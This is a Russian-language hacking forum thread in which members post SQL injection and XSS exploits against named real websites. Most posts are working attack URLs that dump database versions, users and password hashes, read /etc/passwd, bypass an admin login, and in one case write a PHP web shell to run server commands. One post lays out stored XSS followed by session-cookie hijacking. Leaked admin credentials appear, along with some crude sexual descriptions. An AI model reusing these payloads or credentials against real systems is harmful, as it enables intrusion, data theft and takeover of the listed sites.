Уязвимости SQLi, XSS и другие.

Обсуждение в разделе «Песочница», начал(-а) Егорыч+++, 10.05.2015.

  1. BabaDook

    BabaDook Member

    Регистрация:
    9.05.2015
    Сообщения:
    566
    Одобрения:
    467
    Репутация:
    37
    Думал что- же такое. В итоге оказался пустяк.
    PHP:
    http://randyfath.com/international.php?id=-53 UnIon SeLEcT 0x3120616e642066616c7365202020756e696f6e2073656c65637420312c322c7573657228292c342c352c36,2,3,4,5,6
    Просто не обычно
     
    Это одобряют leksadin и t0ma5.
  2. joelblack

    joelblack Level 8

    Регистрация:
    6.07.2015
    Сообщения:
    69
    Одобрения:
    78
    Репутация:
    15
    target: http://uzswlu.uz
    type: SQL Injection
    Code:
    http://uzswlu.uz/site/search?search=1" and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+
     
  3. pastword

    pastword New Member

    Регистрация:
    19.02.2017
    Сообщения:
    18
    Одобрения:
    0
    Репутация:
    0
    Sql-inject
    Code:
    http://dars.tj/topic.php?SECTION_ID=22'+UnIoN+SeLeCt+1,2,3,4,5,6,7,8,concat_ws(0x3a,LOGIN,PASSWORD),10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+c_user+--+&ID=35&UPPER_ID=
    
    admin:v0_S)B6j1a321ed955a9a82777afe79f9f74bc5d
    teacher:eRuzjWNCd8a62f807a2fe77ab7c3e065697c36d7
     
  4. Печа

    Печа New Member

    Регистрация:
    9.05.2015
    Сообщения:
    28
    Одобрения:
    8
    Репутация:
    17
    Несколько SQLi с чтением файла из файловой системы
    Code:
    http://immersionprograms.com/index.php/info/gallery?sid=956&catid=-1 union all select 1,2,3,load_file('/etc/passwd'),5,6,7,8,9&mcatid=806
    Здесь вывод в title
    Code:
    view-source:http://www.eandkwood.com/category.php?c=1' union all select 1,2,3,load_file('/etc/passwd'),5,6,7 and '0'='0
    Некий шоп с фармой
    Code:
    http://www.rxnature.com/category.html?cid=1' union all select 1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13 and '0'='0
     
    Это одобряет palec2006.
  5. Печа

    Печа New Member

    Регистрация:
    9.05.2015
    Сообщения:
    28
    Одобрения:
    8
    Репутация:
    17
    Запись минишела через SQLi и выполнение команд на сервере.
    Code:
    http://www.hamber.net/News_Detail.php?SN=-1 union all select 1,2,3,'<?php system($_GET[cmd]);?>',5,6,7 into outfile '/var/www/html/xux.php' --+
    http://www.hamber.net/xux.php?cmd=ls -l
     
  6. Печа

    Печа New Member

    Регистрация:
    9.05.2015
    Сообщения:
    28
    Одобрения:
    8
    Репутация:
    17
    SQLi Error base внедрение двойным запросом.
    Code:
    http://www.hairboutique.com/glossary/Detail.php?Keyword=Dimethicone Copolyol Meadowfoamate' and (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) and '1'='1
    root@HB-85|file_priv Y|5.5.19|Win64x86|
     
  7. Печа

    Печа New Member

    Регистрация:
    9.05.2015
    Сообщения:
    28
    Одобрения:
    8
    Репутация:
    17
    Сайт: russikona.ru ТИЦ 160
    SQLi Error base
    russikon_db@localhost|file_priv N|5.5.52-cll-lve|Linux|MySQL Community Server (GPL)|x86_64|
    Code:
    http://www.russikona.ru/news.php?id=198' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='admin' limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+
    XSS-reflected:
    Code:
    http://www.russikona.ru/news.php?id=198%27%3e%3cbody+onload%3dalert(document.cookie)%3e
    Надеюсь ничьих чувств не оскорбил :)
     
    Это одобряет artkar.
  8. Печа

    Печа New Member

    Регистрация:
    9.05.2015
    Сообщения:
    28
    Одобрения:
    8
    Репутация:
    17
    Сайт: rakuraku-home.jp
    SQLi Error base через POST
    queserser_1301@10.1.0.111|5.0.27-standard-log|unknown-linux-gnu|x86_64|MySQL Community Edition - Standard (GPL)|
    Уязвимые параметры account и password
    В запросе через Repeater нужно отправить в параметр account эксплоит, а в параметр password любой символ, букву или цифру
    эксплоит:
    Code:
    URL:http://www.rakuraku-home.jp/system/login/login.php
    POST:' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) #
    вход в админку логин и пароль 1' or '1
    Админка:
    Code:
    http://www.rakuraku-home.jp/system/
     
    Это одобряет artkar.
  9. Печа

    Печа New Member

    Регистрация:
    9.05.2015
    Сообщения:
    28
    Одобрения:
    8
    Репутация:
    17
    Парочка сайтов с финансовой тематикой
    Сайт: eltee.de
    SQL Injection через GET, уязвимый параметр id, вывод в title
    pc-linux-gnu:i686:dbo456679871@212.227.29.56:db456679871:5.1.73
    эксплоит:
    Code:
    view-source:http://www.eltee.de/education_id.php?id=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version_compile_os,0x3a,@@version_compile_machine,0x3a,user(),0x3a,database(),0x3a,@@version,0x3a,0x3a,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)
    Сайт: businesstoday.lk
    SQL Injection через GET, уязвимый параметр issue
    5.5.52-cll:bttoday_bt:bttoday_btadmin@localhost:Linux:i686:/usr
    эксплоит:
    Code:
    http://www.businesstoday.lk/bnb.php?bnbId=&issue=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version,0x3a,database(),0x3a,user(),0x3a,@@version_compile_os,0x3a,@@version_compile_machine,0x3a,@@basedir,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)
     
  10. Печа

    Печа New Member

    Регистрация:
    9.05.2015
    Сообщения:
    28
    Одобрения:
    8
    Репутация:
    17
    Шоп с 3d принтерами и всяким оборудованием
    Сайт: smtmax.com
    SQL Injection через GET, уязвимый параметр act
    Linux:x86_64:smtmax8_smtmax@localhost:smtmax8_smtmax:5.6.35:/usr
    эксплоит:
    Code:
    http://www.smtmax.com/info.php?act=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(%40%40version_compile_os%2c0x3a%2c%40%40version_compile_machine%2c0x3a%2cuser()%2c0x3a%2cdatabase()%2c0x3a%2c%40%40version%2c0x3a%2c%40%40basedir%2c0x3a%2cFLOOR(RAND(0)*2))a+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+a)b)%2b%27
    Сайт адалт тематики: straightpornstuds.com
    Примерные данные за день
    Посетителей: 1469
    Просмотров: 5878
    Boolean Based SQL Injection
    5.0.96 log:str5lt3m 2@107.180.121.24:str5lt3m1 2
    Если появился видео ролик от BRAZERS с брюнеткой в очках с толстой жопой и силиконовыми буферами значит "true"
    Если перекинуло на ролик от DDFnetwork где бландинку долбят в рот в четыре ствола это "false"
    эксплоит:
    Code:
    http://straightpornstuds.com/80341%20OR%20(select%20ascii(substr(database(),1,1))=115).html
    P.s. когда true страничка может долго подгружаться.
     
    #270 Печа, 19.05.2017, 18:56
    В последний раз редактировалось: 19.05.2017, 19:16
    Это одобряют BFM, Угрюмый и t0ma5.
  11. Печа

    Печа New Member

    Регистрация:
    9.05.2015
    Сообщения:
    28
    Одобрения:
    8
    Репутация:
    17
    Щоп с компьютерными аксессуарами
    Сайт: groupgear.co.uk
    MS SQL Injection через POST
    уязвимый параметр inputsearch
    microsoft sql server 2012 (sp1) - 11.0.3156.0 (x64) may 4 2015 18:48:09 copyright (c) microsoft corporation web edition (64-bit) on windows nt 6.2 &lt;x64&gt; (build 9200: ) (hypervisor)|
    computergear2012|computerSQL2014
    эксплоит:
    Code:
    URL:http://www.groupgear.co.uk/searchResults.asp
    POST:'AND 1=cast(@@VERSION as varchar(8000)) or '1'='
     
  12. Печа

    Печа New Member

    Регистрация:
    9.05.2015
    Сообщения:
    28
    Одобрения:
    8
    Репутация:
    17
    Сайт: magiclantern.org.uk
    Boolean Based SQL Injection черз GET, уязвимый параметр id
    5.5.54-38 7-log:umag_249477_0001 linweb7.atlas.pipex.net:magiclanternorguk_249477_db1
    Если есть пост с заголовком The Temple of Minerva "true"
    Если нет поста с заголовком The Temple of Minerva "false"
    Эксплоит:
    Code:
    http://www.magiclantern.org.uk/sales/publications.php?id=13 OR (select ascii(substr(@@VERSION,1,1))=53)
    Stored XSS:
    Уязвимые параметры: Contact_Name;Email_address;Email_address2;Subject
    Открываем URL в Firefox и в одном из уязвимых полей или во всех вставляем payload, жмем Submit, наш код сохранился на сервере
    Code:
    URL:http://www.magiclantern.org.uk/contact.php
    payload: "><img src=ssds onerror=alert(666) width=0 height=0>
    Теперь нужно сохранить Cookie PHPSESSID(из Firefox) в блокнот
    Вычистим куки из Firefox и пройдем снова по нашему URL ни чего не работает (( закрываем Firefox и открываем другой браузер,
    например хром, устанавливаем туда любой кукименежжер, открываем любую страницу нашего сайта например главную magiclantern.org.uk
    в куки менеджере меняем Cookie PHPSESSID(из Хром) на Cookie PHPSESSID(из Firefox) переходим на вкладку Contact Us видим выполнение нашего скрипта в хроме.
     
  13. BabaDook

    BabaDook Member

    Регистрация:
    9.05.2015
    Сообщения:
    566
    Одобрения:
    467
    Репутация:
    37
    НУ я так и знал. А вам слабо самому что-то найти и сделать? Вы попробуйте, я уверен вы сможете. Я просто не понимаю, я конечно не профи, но я невкуриваю, зачем крутить как слепую когда есть вывод. А вообще, скажи мне , что это а инструмент такой?
    Там ещё мод сек, только что он делает я не понял
    [​IMG]
     
    #273 BabaDook, 22.05.2017, 00:39
    В последний раз редактировалось: 22.05.2017, 00:51
    Это одобряет Печа.
  14. Печа

    Печа New Member

    Регистрация:
    9.05.2015
    Сообщения:
    28
    Одобрения:
    8
    Репутация:
    17
    Code:
    http://www.magiclantern.org.uk/sales/publications.php?id=-1 union all select 1,2,USER(),@@version,database(),@@basedir,@@version_compile_os,@@version_compile_machine,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 --+
    Так лучше ? ))
     
  15. Печа

    Печа New Member

    Регистрация:
    9.05.2015
    Сообщения:
    28
    Одобрения:
    8
    Репутация:
    17
    burpsuite, SQLmap, Netsparker
     
  16. Печа

    Печа New Member

    Регистрация:
    9.05.2015
    Сообщения:
    28
    Одобрения:
    8
    Репутация:
    17
    SQLi с чтением файла из файловой системы и file_priv Y
    Сайт:eohu.ca
    Уязвимый параметор: newsID через GET
    root:Y,root:Y,root:Y,debian-sys-maint:Y,phpmyadmin:N,root:Y
    root@localhost:5.1.49-1ubuntu8:debian-linux-gnu:x86_64
    Эксплоит:
    Code:
    http://www.eohu.ca/news/view_news_e.php?newsID=-1' union all select group_concat(user,0x3a,file_priv),user(),load_file('/etc/passwd') from mysql.user --+
     
  17. BabaDook

    BabaDook Member

    Регистрация:
    9.05.2015
    Сообщения:
    566
    Одобрения:
    467
    Репутация:
    37
    HTML:
    https://www.onlinedoctranslator.com/translationform
    Склонен считать что там включены внешние сущности, однако какого либо вывода полезности получить не удалось(((
     
  18. Печа

    Печа New Member

    Регистрация:
    9.05.2015
    Сообщения:
    28
    Одобрения:
    8
    Репутация:
    17
    SQLi с чтением файла из файловой системы
    Сайт:bbgv.org
    Уязвимый параметор: cat_id через GET
    root:Y,root:Y,root:Y,:N,:N,bbgv_web:N,bbgv_bk:N
    root@localhost:5.1.73:redhat-linux-gnu:x86_64
    Эксплоит:
    Code:
    view-source:http://bbgv.org/bbgv-events/events.html?cat_id=-1 union all select 1,2,3,group_concat(user,0x3a,file_priv),5,6,7,8,9,10,user(),12,13,14,15,load_file('/etc/passwd'),17,18,19,20,21,22,23,24,25,26 from mysql.user --+
     
Загрузка...